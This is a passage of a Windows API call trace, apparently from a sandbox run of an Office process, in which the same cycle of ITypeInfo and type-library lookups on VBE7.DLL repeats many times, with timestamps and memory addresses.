pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.598] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.598] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb3100, pBstrName=0x0, pwOrdinal=0x33e4fb3120 | out: pBstrDllName=0x33e4fb3100*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb3120*=0x3390) returned 0x0 [0060.598] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb3100, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb3100, pwOrdinal=0x500000000) returned 0x0 [0060.598] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb31e0, pIndex=0x0 | out: ppTLib=0x33e4fb31e0*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.599] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb31f0, pDummy=0x0 | out: ppTLibAttr=0x33e4fb31f0, pDummy=0x0) returned 0x0 [0060.599] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.599] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.599] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb31e0, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.599] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.599] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb31e0, pBstrName=0x0, pwOrdinal=0x33e4fb3200 | out: pBstrDllName=0x33e4fb31e0*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb3200*=0x3470) returned 0x0 [0060.599] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb31e0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb31e0, pwOrdinal=0x500000000) returned 0x0 [0060.599] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb32c0, pIndex=0x0 | out: ppTLib=0x33e4fb32c0*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.599] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb32d0, pDummy=0x0 | out: ppTLibAttr=0x33e4fb32d0, pDummy=0x0) returned 0x0 [0060.599] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.599] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.599] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb32c0, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.599] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.599] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb32c0, pBstrName=0x0, pwOrdinal=0x33e4fb32e0 | out: pBstrDllName=0x33e4fb32c0*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb32e0*=0x3550) returned 0x0 [0060.599] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb32c0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb32c0, pwOrdinal=0x500000000) returned 0x0 [0060.599] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb33a0, pIndex=0x0 | out: ppTLib=0x33e4fb33a0*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.599] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb33b0, pDummy=0x0 | out: ppTLibAttr=0x33e4fb33b0, pDummy=0x0) returned 0x0 [0060.599] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.599] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.599] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb33a0, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.599] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.599] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb33a0, pBstrName=0x0, pwOrdinal=0x33e4fb33c0 | out: pBstrDllName=0x33e4fb33a0*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb33c0*=0x3630) returned 0x0 [0060.599] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb33a0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb33a0, pwOrdinal=0x500000000) returned 0x0 [0060.599] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb3480, pIndex=0x0 | out: ppTLib=0x33e4fb3480*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.599] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb3490, pDummy=0x0 | out: ppTLibAttr=0x33e4fb3490, pDummy=0x0) returned 0x0 [0060.599] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.599] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.599] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb3480, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.599] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.600] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb3480, pBstrName=0x0, pwOrdinal=0x33e4fb34a0 | out: pBstrDllName=0x33e4fb3480*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb34a0*=0x3710) returned 0x0 [0060.600] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb3480, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb3480, pwOrdinal=0x500000000) returned 0x0 [0060.600] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb3560, pIndex=0x0 | out: ppTLib=0x33e4fb3560*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.600] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb3570, pDummy=0x0 | out: ppTLibAttr=0x33e4fb3570, pDummy=0x0) returned 0x0 [0060.600] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.600] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.600] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb3560, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.600] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.600] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb3560, pBstrName=0x0, pwOrdinal=0x33e4fb3580 | out: pBstrDllName=0x33e4fb3560*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb3580*=0x37f0) returned 0x0 [0060.600] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb3560, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb3560, pwOrdinal=0x500000000) returned 0x0 [0060.600] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb3640, pIndex=0x0 | out: ppTLib=0x33e4fb3640*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.600] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb3650, pDummy=0x0 | out: ppTLibAttr=0x33e4fb3650, pDummy=0x0) returned 0x0 [0060.600] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.600] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.600] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb3640, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.600] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.600] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb3640, pBstrName=0x0, pwOrdinal=0x33e4fb3660 | out: pBstrDllName=0x33e4fb3640*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb3660*=0x38d0) returned 0x0 [0060.600] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb3640, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb3640, pwOrdinal=0x500000000) returned 0x0 [0060.600] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb3720, pIndex=0x0 | out: ppTLib=0x33e4fb3720*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.600] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb3730, pDummy=0x0 | out: ppTLibAttr=0x33e4fb3730, pDummy=0x0) returned 0x0 [0060.600] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.600] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.600] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb3720, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.600] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.600] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb3720, pBstrName=0x0, pwOrdinal=0x33e4fb3740 | out: pBstrDllName=0x33e4fb3720*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb3740*=0x39b0) returned 0x0 [0060.600] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb3720, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb3720, pwOrdinal=0x500000000) returned 0x0 [0060.600] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb3800, pIndex=0x0 | out: ppTLib=0x33e4fb3800*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.601] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb3810, pDummy=0x0 | out: ppTLibAttr=0x33e4fb3810, pDummy=0x0) returned 0x0 [0060.601] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.601] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.601] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb3800, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.601] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.601] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb3800, pBstrName=0x0, pwOrdinal=0x33e4fb3820 | out: pBstrDllName=0x33e4fb3800*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb3820*=0x3a90) returned 0x0 [0060.601] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb3800, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb3800, pwOrdinal=0x500000000) returned 0x0 [0060.601] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb38e0, pIndex=0x0 | out: ppTLib=0x33e4fb38e0*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.601] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb38f0, pDummy=0x0 | out: ppTLibAttr=0x33e4fb38f0, pDummy=0x0) returned 0x0 [0060.601] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.601] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.601] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb38e0, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.601] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.601] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb38e0, pBstrName=0x0, pwOrdinal=0x33e4fb3900 | out: pBstrDllName=0x33e4fb38e0*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb3900*=0x3b70) returned 0x0 [0060.601] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb38e0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb38e0, pwOrdinal=0x500000000) returned 0x0 [0060.601] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb39c0, pIndex=0x0 | out: ppTLib=0x33e4fb39c0*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.601] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb39d0, pDummy=0x0 | out: ppTLibAttr=0x33e4fb39d0, pDummy=0x0) returned 0x0 [0060.601] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.601] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.601] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb39c0, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.601] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.601] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb39c0, pBstrName=0x0, pwOrdinal=0x33e4fb39e0 | out: pBstrDllName=0x33e4fb39c0*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb39e0*=0x3c50) returned 0x0 [0060.601] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb39c0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb39c0, pwOrdinal=0x500000000) returned 0x0 [0060.601] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb3aa0, pIndex=0x0 | out: ppTLib=0x33e4fb3aa0*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.601] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb3ab0, pDummy=0x0 | out: ppTLibAttr=0x33e4fb3ab0, pDummy=0x0) returned 0x0 [0060.601] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.601] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.601] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb3aa0, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.601] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.602] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb3aa0, pBstrName=0x0, pwOrdinal=0x33e4fb3ac0 | out: pBstrDllName=0x33e4fb3aa0*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb3ac0*=0x3d30) returned 0x0 [0060.602] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb3aa0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb3aa0, pwOrdinal=0x500000000) returned 0x0 [0060.602] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb3b80, pIndex=0x0 | out: ppTLib=0x33e4fb3b80*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.602] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb3b90, pDummy=0x0 | out: ppTLibAttr=0x33e4fb3b90, pDummy=0x0) returned 0x0 [0060.602] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.602] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.602] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb3b80, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.602] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.602] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb3b80, pBstrName=0x0, pwOrdinal=0x33e4fb3ba0 | out: pBstrDllName=0x33e4fb3b80*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb3ba0*=0x3e10) returned 0x0 [0060.602] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb3b80, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb3b80, pwOrdinal=0x500000000) returned 0x0 [0060.602] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb3c60, pIndex=0x0 | out: ppTLib=0x33e4fb3c60*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.602] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb3c70, pDummy=0x0 | out: ppTLibAttr=0x33e4fb3c70, pDummy=0x0) returned 0x0 [0060.602] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.602] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.602] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb3c60, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.602] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.602] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb3c60, pBstrName=0x0, pwOrdinal=0x33e4fb3c80 | out: pBstrDllName=0x33e4fb3c60*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb3c80*=0x3ef0) returned 0x0 [0060.602] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb3c60, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb3c60, pwOrdinal=0x500000000) returned 0x0 [0060.602] IMalloc:Realloc (This=0x7ffd098ff3f0, pv=0x1d39dbc8430, cb=0x1410) returned 0x1d39dbc8430 [0060.602] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb3d40, pIndex=0x0 | out: ppTLib=0x33e4fb3d40*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.602] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb3d50, pDummy=0x0 | out: ppTLibAttr=0x33e4fb3d50, pDummy=0x0) returned 0x0 [0060.602] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.602] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.602] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb3d40, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.602] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.602] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb3d40, pBstrName=0x0, pwOrdinal=0x33e4fb3d60 | out: pBstrDllName=0x33e4fb3d40*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb3d60*=0x3fd0) returned 0x0 [0060.602] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb3d40, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb3d40, pwOrdinal=0x500000000) returned 0x0 [0060.602] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb3e20, pIndex=0x0 | out: ppTLib=0x33e4fb3e20*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.603] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb3e30, pDummy=0x0 | out: ppTLibAttr=0x33e4fb3e30, pDummy=0x0) returned 0x0 [0060.603] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.603] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.603] 